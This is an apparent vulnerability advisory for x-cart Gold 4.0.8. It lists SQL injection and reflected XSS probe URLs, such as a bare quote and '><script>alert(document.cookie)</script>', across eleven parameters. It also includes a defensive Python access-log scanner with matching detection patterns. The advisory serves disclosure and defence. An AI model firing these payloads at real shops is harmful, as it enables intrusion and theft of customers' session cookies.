SVadvisory#7
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Title: Multiple vulnerabilities in x-cart Gold
The program: x-cart Gold
The vulnerable version: 4.0.8
Homepage: www.x-cart.com
Vulnerability is found: 29.05.05
Has found: CENSORED / SVT / www.svt.nukleon.us
=====================================================================
The description.

SQL injections
---------------
While examining the product, a set of SQL injection vulnerabilities was found. Practically every parameter is affected.
The first bug was found in the parameter "cat": the script does not check this parameter, and passing a single quote (') makes an SQL injection possible.
Next, a bug was found in the parameter "productid". Because special characters are not checked, passing a single quote to this parameter causes an SQL error, and the script automatically redirects to the error page. On that page the parameter "id" is visible; passing a single quote to it also makes an SQL injection possible.
Next, the parameter "mode": substituting special characters produces an error, and an SQL injection is possible.
Finally, the parameter "section" also allows an SQL injection.
XSS
---------------
XSS vulnerabilities exist in the same parameters as the SQL injections.
=====================================================================
Example
^^^^^^^^^

SQL injections
---------------
http://example/home.php?cat='[SQL-inj]
http://example/home.php?printable='[SQL-inj]
http://example/product.php?productid='[SQL-inj]
http://example/product.php?mode='[SQL-inj]
http://example/error_message.php?access_denied&id='[SQL-inj]
http://example/help.php?section='[SQL-inj]
http://example/orders.php?mode='[SQL-inj]
http://example/register.php?mode='[SQL-inj]
http://example/search.php?mode='[SQL-inj]
http://example/giftcert.php?gcid='[SQL-inj]
http://example/giftcert.php?gcindex='[SQL-inj]

XSS
---------------
http://example/home.php?cat='><script>alert(document.cookie)</script>
http://example/home.php?printable='><script>alert(document.cookie)</script>
http://example/product.php?productid='><script>alert(document.cookie)</script>
http://example/product.php?mode='><script>alert(document.cookie)</script>
http://example/error_message.php?access_denied&id='><script>alert(document.cookie)</script>
http://example/help.php?section='><script>alert(document.cookie)</script>
http://example/orders.php?mode='><script>alert(document.cookie)</script>
http://example/register.php?mode='><script>alert(document.cookie)</script>
http://example/search.php?mode='><script>alert(document.cookie)</script>
http://example/giftcert.php?gcid='><script>alert(document.cookie)</script>
http://example/giftcert.php?gcindex='><script>alert(document.cookie)</script>
=====================================================================
The conclusion.
^^^^^^^^^^^
Research was done only on version 4.0.8. Other versions may also be vulnerable.
The vendor has been notified.
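As an added example, not part of this advisory: a small Python scanner that flags access-log requests to the scripts and parameters listed above whenever a watched value carries one of the two probe shapes shown (a bare single quote, or a tag fragment). It assumes Common Log Format, and the log lines are constructed samples.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Script -> parameters named in the advisory for x-cart Gold 4.0.8.
SUSPECT_PARAMS = {
    "home.php": {"cat", "printable"}, "product.php": {"productid", "mode"},
    "error_message.php": {"id"}, "help.php": {"section"}, "orders.php": {"mode"},
    "register.php": {"mode"}, "search.php": {"mode"}, "giftcert.php": {"gcid", "gcindex"},
}
# Probe shapes from the advisory: a tag/script fragment (reflected XSS) and a bare
# quote (SQL injection). Quotes occur in legitimate input, so only watched params count.
XSS_RE = re.compile(r"<\s*script|[<>]", re.IGNORECASE)
SQLI_RE = re.compile(r"'")
# Common Log Format (assumed); captures client, timestamp and request target.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(?:GET|POST) (\S+) [^"]*" \d{3}')

def classify(request_target):
    """Return (script, param, kind) for each watched parameter carrying a probe."""
    parts = urlsplit(request_target)
    script = parts.path.rsplit("/", 1)[-1]
    watched = SUSPECT_PARAMS.get(script, set())
    hits = []
    # parse_qsl percent-decodes, so %27 and %3C arrive here as ' and <.
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if name in watched and XSS_RE.search(value):
            hits.append((script, name, "xss"))
        elif name in watched and SQLI_RE.search(value):
            hits.append((script, name, "sqli"))
    return hits

def scan_log(lines):
    """Return one alert dict per suspicious parameter seen in the log lines."""
    alerts = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not CLF: skip rather than guess
        ip, when, target = m.groups()
        for script, param, kind in classify(target):
            alerts.append({"ip": ip, "time": when, "script": script,
                           "param": param, "kind": kind})
    return alerts

# Constructed sample lines (not real traffic); the last one is benign.
SAMPLE_LOG = [
    '10.0.0.5 - - [29/May/2005:10:00:01 +0000] "GET /home.php?cat=%27 HTTP/1.0" 200 512',
    '10.0.0.5 - - [29/May/2005:10:00:02 +0000] "GET /product.php?productid=%27%3E%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.0" 200 2048',
    '10.0.0.9 - - [29/May/2005:10:00:03 +0000] "GET /error_message.php?access_denied&id=%27 HTTP/1.0" 200 300',
    '10.0.0.7 - - [29/May/2005:10:00:04 +0000] "GET /search.php?mode=search&substring=o%27neil HTTP/1.0" 200 900',
]
```

Running scan_log(SAMPLE_LOG) yields three alerts (cat, productid and id) and nothing for the benign search request, since "substring" is not a watched parameter.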
If you have any remarks, write to censored@mail.ru
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Search Vulnerabilities Team / www.svt.nukleon.us / CENSORED | Cash | Fredy | patr0n | Loader